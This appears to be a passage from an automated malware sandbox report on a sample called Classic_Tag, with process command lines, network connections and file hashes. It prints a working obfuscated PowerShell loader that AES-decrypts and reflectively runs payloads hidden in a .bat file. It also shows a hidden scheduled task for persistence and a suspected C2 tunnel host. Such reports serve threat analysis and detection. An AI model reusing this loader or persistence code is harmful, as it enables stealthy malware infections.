'')('C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_690_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_690.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_690.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_690.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_690.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_690.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 24.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.43.201.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 147.185.221.18:45119 | looking-memphis.gl.at.ply.gg | tcp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| NL | 23.62.61.170:443 | www.bing.com | tcp |
| NL | 23.62.61.170:443 | www.bing.com | tcp |
| NL | 23.62.61.75:443 | th.bing.com | tcp |
| NL | 23.62.61.75:443 | th.bing.com | tcp |
| IE | 20.190.159.2:443 | login.microsoftonline.com | tcp |
| US | 151.101.1.171:443 | geoip.businessinsider.com | tcp |
| US | 151.101.1.171:443 | geoip.businessinsider.com | tcp |
| US | 147.185.221.18:45119 | looking-memphis.gl.at.ply.gg | tcp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 151.101.2.217:443 | i.insider.com | tcp |
| US | 151.101.2.217:443 | i.insider.com | tcp |
| FR | 18.164.52.33:443 | cmp.osano.com | tcp |
| FR | 18.164.52.33:443 | cmp.osano.com | tcp |
| US | 151.101.1.171:443 | geoip.businessinsider.com | tcp |
| US | 8.8.8.8:53 | my.businessinsider.com | udp |
| US | 151.101.0.64:443 | i.businessinsider.com | tcp |
| US | 104.22.44.136:443 | my.businessinsider.com | tcp |
| FR | 18.244.28.74:443 | cdn.flipboard.com | tcp |
| US | 104.18.43.90:443 | cdn.confiant-integrations.net | tcp |
| US | 172.64.146.86:443 | businessinsider.edge.permutive.app | tcp |
| US | 104.21.50.90:443 | sdk.mrf.io | tcp |
| FR | 18.244.28.87:443 | cdn-magiclinks.trackonomics.net | tcp |
| NL | 23.63.101.170:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 136.44.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.28.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.43.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.146.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.50.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.28.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pub.doubleverify.com | udp |
| US | 8.8.8.8:53 | micro.rubiconproject.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 151.101.0.64:443 | i.businessinsider.com | tcp |
| US | 104.18.166.224:443 | pub.doubleverify.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| BE | 104.68.78.171:443 | micro.rubiconproject.com | tcp |
| US | 35.201.104.135:443 | vi.ml314.com | tcp |
| US | 34.117.77.79:443 | ml314.com | tcp |
| US | 104.18.239.248:443 | cdn.tinypass.com | tcp |
| US | 18.245.174.120:443 | c.amazon-adsystem.com | tcp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | tcp |
| FR | 13.32.145.43:443 | cdn.sophi.io | tcp |
| US | 13.32.164.104:443 | sb.scorecardresearch.com | tcp |
| US | 8.8.8.8:53 | 104.164.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.skimresources.com | udp |
| US | 8.8.8.8:53 | ak.sail-horizon.com | udp |
| US | 8.8.8.8:53 | cdn.brandmetrics.com | udp |
| FR | 52.222.169.4:443 | ak.sail-horizon.com | tcp |
| US | 104.26.0.90:443 | cdn.brandmetrics.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 104.18.166.224:443 | pub.doubleverify.com | tcp |
| US | 8.8.8.8:53 | pb-rtd.ccgateway.net | udp |
| US | 8.8.8.8:53 | snap.licdn.com | udp |
| GB | 199.232.56.157:443 | static.ads-twitter.com | tcp |
| US | 35.94.16.34:443 | pb-rtd.ccgateway.net | tcp |
| US | 151.101.1.44:443 | cdn.taboola.com | tcp |
| US | 52.91.215.149:443 | data-sales.ccgateway.net | tcp |
| US | 104.16.144.111:443 | c2.piano.io | tcp |
| US | 151.101.1.44:443 | cdn.taboola.com | tcp |
| US | 35.94.16.34:443 | pb-rtd.ccgateway.net | tcp |
| US | 34.117.77.79:443 | ml314.com | udp |
| US | 151.101.0.64:443 | i.businessinsider.com | tcp |
| US | 216.239.32.181:443 | analytics.google.com | tcp |
| US | 75.2.40.13:443 | api.sail-personalize.com | tcp |
| US | 35.94.16.34:443 | pb-rtd.ccgateway.net | tcp |
| BE | 64.233.166.156:443 | stats.g.doubleclick.net | tcp |
| BE | 64.233.166.156:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | direct.adsrvr.org | udp |
| US | 8.8.8.8:53 | ib.adnxs-simple.com | udp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| US | 172.64.151.101:443 | htlb.casalemedia.com | tcp |
| BE | 2.21.17.83:443 | a.teads.tv | tcp |
| BE | 2.21.17.83:443 | a.teads.tv | tcp |
| US | 52.223.6.21:443 | direct.adsrvr.org | tcp |
| US | 52.223.6.21:443 | direct.adsrvr.org | tcp |
| NL | 185.89.211.116:443 | ib.adnxs-simple.com | tcp |
| NL | 185.89.211.116:443 | ib.adnxs-simple.com | tcp |
| NL | 69.173.156.150:443 | prebid-server.rubiconproject.com | tcp |
| NL | 69.173.156.150:443 | prebid-server.rubiconproject.com | tcp |
| NL | 69.173.156.150:443 | prebid-server.rubiconproject.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| FR | 18.244.28.105:443 | hb.yellowblue.io | tcp |
| FR | 18.244.28.105:443 | hb.yellowblue.io | tcp |
| US | 52.91.215.149:443 | privacy-location-edge.ccgateway.net | tcp |
| BE | 104.68.95.245:443 | cdn.cxense.com | tcp |
| US | 104.244.42.131:443 | analytics.twitter.com | tcp |
| PL | 93.184.221.165:443 | t.co | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| FR | 18.244.28.105:443 | hb.yellowblue.io | tcp |
| FR | 52.84.174.60:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 156.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.40.2.75.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.151.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.211.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.6.223.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.95.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.28.244.18.in-addr.arpa | udp |
| FR | 18.155.124.109:443 | aax.amazon-adsystem.com | tcp |
| FR | 18.155.124.109:443 | aax.amazon-adsystem.com | tcp |
| US | 2.22.144.155:443 | snap.licdn.com | tcp |
| FR | 18.155.129.80:443 | launchpad-wrapper.privacymanager.io | tcp |
| US | 104.22.52.173:443 | cdn.hadronid.net | tcp |
| FR | 18.155.129.21:443 | tags.crwdcntrl.net | tcp |
| US | 151.101.1.91:443 | s.skimresources.com | tcp |
| FR | 18.244.28.83:443 | paywall.sophi.io | tcp |
| FR | 18.155.129.113:443 | launchpad.privacymanager.io | tcp |
| US | 35.190.91.160:443 | p.skimresources.com | tcp |
| US | 35.190.91.160:443 | p.skimresources.com | tcp |
| US | 35.201.67.47:443 | t.skimresources.com | tcp |
| US | 35.190.59.101:443 | r.skimresources.com | tcp |
| US | 104.22.5.69:443 | a.ad.gt | tcp |
| IE | 20.107.224.50:443 | collector.brandmetrics.com | tcp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| IE | 63.33.74.9:443 | bcp.crwdcntrl.net | tcp |
| US | 18.245.199.9:443 | geo.privacymanager.io | tcp |
| FR | 18.244.28.111:443 | fr-actions.trackonomics.net | tcp |
| US | 35.201.67.47:443 | t.skimresources.com | udp |
| US | 18.245.175.70:443 | trx-hub.com | tcp |
| US | 18.245.175.70:443 | trx-hub.com | tcp |
| US | 104.22.5.69:443 | a.ad.gt | tcp |
| US | 8.8.8.8:53 | 101.59.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.67.201.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.224.107.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.5.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.74.33.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.199.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.28.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.175.245.18.in-addr.arpa | udp |
| NL | 141.226.228.48:443 | trc-events.taboola.com | tcp |
| US | 104.18.144.126:443 | buy.tinypass.com | tcp |
| FR | 57.128.96.120:443 | events.newsroom.bi | tcp |
| US | 216.239.32.181:443 | analytics.google.com | udp |
| DE | 35.157.80.156:443 | prebid-a.rubiconproject.com | tcp |
| DE | 35.157.80.156:443 | prebid-a.rubiconproject.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0c705388d79c00418e5c1751159353e3 |
| SHA1 | aaeafebce5483626ef82813d286511c1f353f861 |
| SHA256 | 697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d |
| SHA512 | c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f |
\??\pipe\LOCAL\crashpad_2456_DVVUUPLFXLHSAZQF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0d84d1490aa9f725b68407eab8f0030e |
| SHA1 | 83964574467b7422e160af34ef024d1821d6d1c3 |
| SHA256 | 40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e |
| SHA512 | f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2bf936bddf9beb45b61783e9d6474439 |
| SHA1 | aa15d0e509ae2e78ffe266daff152c354ccea01e |
| SHA256 | ea5d8885f02d9d11cee90e5cc8de02abdcaaa433df5cd0063ab9a47926f30b13 |
| SHA512 | 862f31aea8ba176d15d25f36aa3ddf5236c59c418890c3b02a461597cf10b49b40ee22946a6172cd1b129a865ef3fbf1018f6e89d08299d44b9b3ac2ee4919eb |
C:\Users\Admin\Downloads\Classic_Tag.zip
| MD5 | 90cbdd4859c446fed1a9c40696a67f4a |
| SHA1 | 7efd767733f22d880283899781a039d34004b00a |
| SHA256 | d8f808e425c141619646fb187a9a402394c59459da06df287b88fd977fae5df5 |
| SHA512 | 3b170cf326360cb2cdb6be6581105b19266241b82fa35f29f1eb53bfce99894a3168bcbf5d5491cb339de7e6f4963c693e423698b93ec61dfaa4630706b7cdfd |
C:\Users\Admin\Downloads\Classic_Tag.zip:Zone.Identifier
| MD5 | 6f1bb86ac1640cffc98d12c8bb6162ea |
| SHA1 | 68c018bc23f169d2b052a2f4f57783e4d9c56f3d |
| SHA256 | bc2229e54075f536e88b12416f1c6a9a7002972ddfcb23a024c46fc74d4feb80 |
| SHA512 | 9e4dddb24f2f889f8d94d486b0c8180e3311faf04d52fd0a40949cd4d055b2c6afb4853fdd3f7b18453a5a67b329f9db59fd00d77ab075b648269d4a48c9d39d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6e3ecf2e726b4688a3b50a1da7c30aa3 |
| SHA1 | 112056c3a0422ebf82f4be0713c6be4070b45e25 |
| SHA256 | a30bf1cfe5b9a86e9a2ea1908925ded1c0db3081b9c7c4d3b0bf7c5ab65d7661 |
| SHA512 | 3e8c25e1e1f26724b18b615f5dc7503d9c6ef794a1fc43b1ef41044bc2615050d9c11ed23e8fd45e29dbf1120fa4538e067bac0331989bd44ea717a09ec91c02 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bf3b27cf2b30c35b235f2c7dc71235ff |
| SHA1 | 1cfd9eb98ea08d02f05c0e462721f3c07fd82c81 |
| SHA256 | a02f3e65652296d17e452d1790804cf30c7a8d275d0047677e72126ff4237823 |
| SHA512 | f625104f94e9e59918e662b14b0690ad582167ac9ecf4b9eaadc6f9406f50eded7e92fe6df7d6681278bdd5da18a516bbc5c6ce94ed893944efdd00b5ba7d4ac |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rzpx5gyj.cov.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1548-72-0x0000021987B90000-0x0000021987BB2000-memory.dmp
memory/1548-81-0x0000021987B80000-0x0000021987B88000-memory.dmp
memory/1548-82-0x0000021987D40000-0x0000021987D72000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7c082a4571d1b9f96be4c8ef511ffdce |
| SHA1 | 4543e2b0bae2e14bdb733d71ab89f29a6c386e6b |
| SHA256 | 4dc3d729d7590b19e02effb657c53b71f5fb0bdde870e2f8b6fcb2c8a2d05a7e |
| SHA512 | afdb5bf614ca2bc0ad4dc71c9c762c411624a8a32d0cec394132a9d7b8b35ddbf2266e3932b35ecf87217a0817ea128e48fd5beda9ea3047d961a108edc3ea1c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb15ee5741b379245ca8549cb0d4ecf8 |
| SHA1 | 3555273945abda3402674aea7a4bff65eb71a783 |
| SHA256 | b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636 |
| SHA512 | 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\startup_str_714.vbs
| MD5 | 28098c37d913d16ceb796e4e56a5d747 |
| SHA1 | 7245e7e99cf473fc4e59533d815718b7b3446ccd |
| SHA256 | 247e81ec42c38b83a2103a903883b931102c0819e19e005fc2338e3535fe898f |
| SHA512 | 60615c3868e01dcb4303029fbefc70453e47d2202a60c60ded8d3beed7b8e9594c7b15dc9720b1651e5ace124617f9ae26a0abea979fc85d677c4884ee8be23c |
C:\Users\Admin\AppData\Roaming\startup_str_714.bat
| MD5 | 63314994ebe02008490fdfefa0d57511 |
| SHA1 | 704c26daec5cbed1e7378952699ceebc60e99218 |
| SHA256 | 44a89e1a91362387bc0a2a405ee2f13ae33c0b74a6cec88a0c7b5228c0839fc7 |
| SHA512 | 6c1f4c40ee3c4812f3035d5685ce0aeaa934739a8b58998201673c00d81461031dc6794ebe9c99214c640f09b6cb6b36adf5c994c8408ae1286336deb646bb04 |
memory/1020-130-0x0000019138700000-0x0000019138732000-memory.dmp
memory/1020-131-0x0000019138730000-0x000001913873E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6a1071fd7ffbb67341ab8622e4cad56f |
| SHA1 | cd9210c475d4d98e91546a2b87bb73478b22657d |
| SHA256 | 0f211c967cdbadc59fbf6f45c04ca91e9ad4ff27f0503f8c87046750ca2fc697 |
| SHA512 | c86cc9762c40983973784bb3aa678767ce1ed17dd7a685465f6a3008f04cafc14cd669b0ecec88f07dfa9a2ac90d1f420470c19ed2831f25ad423a839000e2f6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7fa1ae66c75b2a500f8bdc3ffdd92fe9 |
| SHA1 | d05f8e1acf3ff72dd3680f05a78789fe342cc65c |
| SHA256 | 920238f68aacb53f59e100ff5b649a38e231f95b1cfe3e09356567532601afee |
| SHA512 | d89f01f031df0f8cd8dc8a391b5432591035f1df6e72f4743e2bfc22398ac2f79a10e5bfe42caabf6fcd11d8ed3cbda785745228dd2fc634596fbd39ec6bfd2f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d41a216ab548ade6b289dccb3e2bf6f9 |
| SHA1 | de96e229bd7f1401eb17b56e1c415f22f53ece55 |
| SHA256 | 07ddb16a2061895687e31301df76982f030377b891fa83800d2b3aa1e734c400 |
| SHA512 | 25c622bac2bd4140bf23b043846477bc16ef6cff9eebb220eff0ebb738f3c7fa4c375bb4eb9d32ecb1c9a2dbb07466e144ce8f6aca141ca1f58241ae8dd7597d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | f43dbd501081eb5c8da17ec69f6e1e09 |
| SHA1 | c8a79c12203e5115b052c3335b604bf0f7ed9be1 |
| SHA256 | 267f3bf0a3652bf4205caaaf8fe2512a7c9c9a83c943a2cacc02b5c6898f3a5f |
| SHA512 | ad82f2de7cabd27e4485e0b4b3cf0f5b0205889279bef0e27806e20c923079dbd8220b077b2de4fd89cb00adbf6f4c5d3d5591fa4100a4e8569d5635f4cd9926 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4ca42e9cc6de90060a4503debda3ea58 |
| SHA1 | 652f325e5c423876d85ba1a164301ab2d147604b |
| SHA256 | 67b7e0001e15e60f1e5c92ce49644ce08500a099fd94135d179b8dfe0513567c |
| SHA512 | 38303f1959a2fe056c3cdba1fc775538c21b20364c25154d9f8ca365f3abf8a240b3d3851b8854ddf33a994ae0ef55b6fdaafe695eef658a2386f0c8e05b1e10 |
C:\Users\Admin\AppData\Roaming\startup_str_242.vbs
| MD5 | 88b92ce85da644b6895b486efaf6fe39 |
| SHA1 | f7e34957b86687c00e308a147e6b5693ade24a70 |
| SHA256 | 89980a40482461a1bfc9f902108578eac50e69a28e4b05abab43f8bf5949cdce |
| SHA512 | 96503e9d6746f5314b83061f8172280be0be93acd9d36334f95ac64c8becba467e494457e138032544c4ce0b9d5783d5a8f364c9b4a95dff7c323e1f5fd6295f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 39e9c03b4853fc7897429d89859bed07 |
| SHA1 | 284e9ecc274bfa1a7b31bb3181a60ed84e8c0a2c |
| SHA256 | ee2b49fbb5facec3177d23729fa9d6435444c5c1ef7c3c18f513a0c75e9ae191 |
| SHA512 | 5baf4ae78182b7fa4499607fb001c5dfe8cf9f94c9d097bc56d42dbae639fe2fdf72a449824e48b6447865d538b9344cc367239340d9c1c1aa851994510d0e0a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 11e8fa223a7a3d7b8dedeac23313e3ea |
| SHA1 | 713a52733322ec267ca24b1d83ff7374f5597bbb |
| SHA256 | 7483e057c800cb16e596a66aeb647f0a478e4d6cdd70815a58fba4bc8dda0566 |
| SHA512 | ff6fcb1e6bc33e4dd2a4aea376f92d5da20999fa970456cdf843e884cb1ca23232e84a8b37a97bedd05e8ac238916c8f5608627edcf5fb87ef5fb0436f89daea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58a9c8.TMP
| MD5 | ebaf45b247749da06f10d2fef5c5e730 |
| SHA1 | 461637a83f7eacf2de904d392876ff0d927c4716 |
| SHA256 | 529d95377662bc34bef69236449c10345188dee16e542d50c9ca5d8bfdddebd3 |
| SHA512 | b2464780958a9d343440b1182831bbc3ad9bd97aa0789212763c1e7e5958b1ea70e8091f21287084223aeec613290d1376ade138c3ebe26c868b45b097bba967 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8528086c51c4f1528a9676038ec213e |
| SHA1 | bd32a682d9df21d36799486346aa1235c96b4d6a |
| SHA256 | 7cd0a49f94c512e57e0a7102352ee68c5d7a320db0eec57aea0d5e648d4bcf4a |
| SHA512 | e89d008113f89b978fb65bd6dd0bcde3c4506fbb14e54aa5296607ae34d94081d1e825750dbd9dd864adea462c8dc1263e3d138c041b3d4b7dee78debdef7374 |
C:\Users\Admin\AppData\Roaming\startup_str_690.vbs
| MD5 | b121b7c1e501abe8ae0ccd6276869e0c |
| SHA1 | 668ea48aaffc2edaca48bb23dd227499041fbc33 |
| SHA256 | de61c3ec819cd11b14650bd8c9b56f14f1b2e3d887519395ed78a594e7731e01 |
| SHA512 | 1bd4e5fd8638f4a565d15dc95c0b4435deb827411eba5fa77613a98c6424c24165827707f200dddc119267746abe50691653db8752870d233980c98e97ed9a89 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | d5f4c60803a57e862fa7cff0d080f6d0 |
| SHA1 | b545784936ed9d70dccf9d96865c1dcb182f2024 |
| SHA256 | 9c21d5846dde8f6c1b7e466b9a5c9bc3f3af17cf67032dfc101d1455f948b7bb |
| SHA512 | 3e109cf1565e3f91165a5d6fae83ef7ca486d72719d3a37293d488d1443d9961bc14b38b7fee1802ca54acc6fb6722971c00a071c7dad3e31e9fb7d90fe23bc7 |